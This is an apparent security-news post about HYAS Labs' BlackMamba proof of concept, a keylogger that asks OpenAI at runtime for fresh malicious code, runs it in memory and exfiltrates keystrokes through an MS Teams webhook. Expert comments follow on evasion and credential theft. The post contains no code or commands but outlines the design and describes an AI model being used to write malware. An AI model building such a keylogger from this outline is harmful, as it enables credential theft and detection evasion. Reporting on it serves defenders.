To illustrate what AI-based malware is capable of, the team at HYAS Labs has just released a proof of concept (PoC) exploiting a large language model to synthesize polymorphic keylogger functionality on-the-fly, dynamically modifying the benign code at runtime — all without any command-and-control infrastructure to deliver or verify the malicious keylogger functionality. The POC and results are published in the HYAS blog post BlackMamba: Using AI to Generate Polymorphic Malware and whitepaper “HYAS Labs Threat Intelligence: BlackMamba AI-Synthesized, Polymorphic Keylogger with On-the-Fly Program Modification.”
To create the POC, HYAS researchers united two seemingly disparate concepts:
a) eliminating the command and control (C2) channel by using malware that could be equipped with intelligent automation and could push-back any attacker-bound data through some benign communication channel, and
b) leveraging AI code generative techniques that could synthesize new malware variants, changing the code such that it can evade detection algorithms.
BlackMamba utilizes a benign executable that reaches out to a high-reputation API (OpenAI) at runtime, so it can return synthesized, malicious code needed to steal an infected user’s keystrokes. It then executes the dynamically generated code within the context of the benign program using Python’s exec() function, with the malicious polymorphic portion remaining totally in-memory. Every time BlackMamba executes, it re-synthesizes its keylogging capability, making the malicious component of this malware truly polymorphic. BlackMamba was tested against an industry leading EDR which will remain nameless, many times, resulting in zero alerts or detections.
Once a device is infected, BlackMamba uses MS Teams. Using its built-in keylogging ability, BlackMamba can collect sensitive information, such as usernames, passwords, credit card numbers, and other personal or confidential data that a user types into their device. Once this data is captured, the malware uses MS Teams webhook to send the collected data to the malicious Teams channel, where it can be analyzed, sold on the dark web, or used for other nefarious purposes.
Delivery uses auto-py-to-exe, an open-source Python package that lets developers convert Python scripts into standalone executable files that can be run on Windows, macOS, and Linux operating systems. As the HYAS blog notes: “The threats posed by this new breed of malware are very real. By eliminating C2 communication and generating new, unique code at runtime, malware like BlackMamba is virtually undetectable by today’s predictive security solutions.”
The HYAS BlackMamba Blog and the full whitepaper are linked here.
UPDATE: I have two comments on this. The first is from Matt Mullins, Senior Security Researcher at Cybrary
“The BlackMamba sample is very interesting due to its integration of ChatGPT to “prompt hack” as part of its initial payload. The malware sends a prompt to ChatGPT, then using that returned information as part of the python code (the exec function) creates the code, which is then injected and subsequently communicates back via teams webhook. This is a very simple yet very advanced piece of malware because it flies under most detection radars by simply using the same applications that users would (either out of curiosity or by job necessity).
“The article says that it doesn’t have a C2, but technically it is using teams for the communication so what (in my opinion) would be a better term is the use of high reputation servers for the “C2” comms (Teams and the Microsoft infrastructure). This strategy isn’t entirely new as it has been used before with things like CDNs to bypass filters. Teams has been adopted by a large number of organizations, and also has a couple of issues beyond this that should warrant a serious conversation about its viability as a secure communications channel.
“The BlackMamba malware is thoughtfully crafted, simple, and elegant. Thus it passes the sniff test of “KISS” or keep-it-simple-stupid when it comes to engineering. The creative use of ChatGPT with the injection code, along with the use of Teams, creates a really great 1-2 punch for bypassing most EDR and detections (human and machine based) as it allows the malware to “swim with the people.” This is a gold-standard for good OpSec, typically.”
Morten Gammelgaard, EMEA, co-founder of BullWall follows up with this:
“Truly unnerving. AI controlled Polymorphic malware without the need of command & control. This is a slam dunk – preventative measures will never be able to keep up and therefore will continue to be less and less effective.
“This particular approach is one example of how the malware never looks the same (the AI regenerates it on each attack) so defenders cannot establish a model to defend against as they now do with known attack methods. The “keystroke” example here takes a common approach to how credentials are stolen and then used for access and shows how that approach can be made much more effective, ie: bypass defenses. Not to mention that this approach did not even require a dedicated C2 server that could be tracked.
“Also, Polymorphic viruses historically rely on mutation engines to alter their decryption routines. If publicly available AI engines enable script kiddies to create these viruses, that’s a real problem.
“When stealing system specific credentials becomes easy, then access and lateral movement is easy and Bam! they have your data. At that point how they harm you is almost moot. Data theft and ransomware are a popular abuses when that happens. So yeah, easier access is a very big deal.”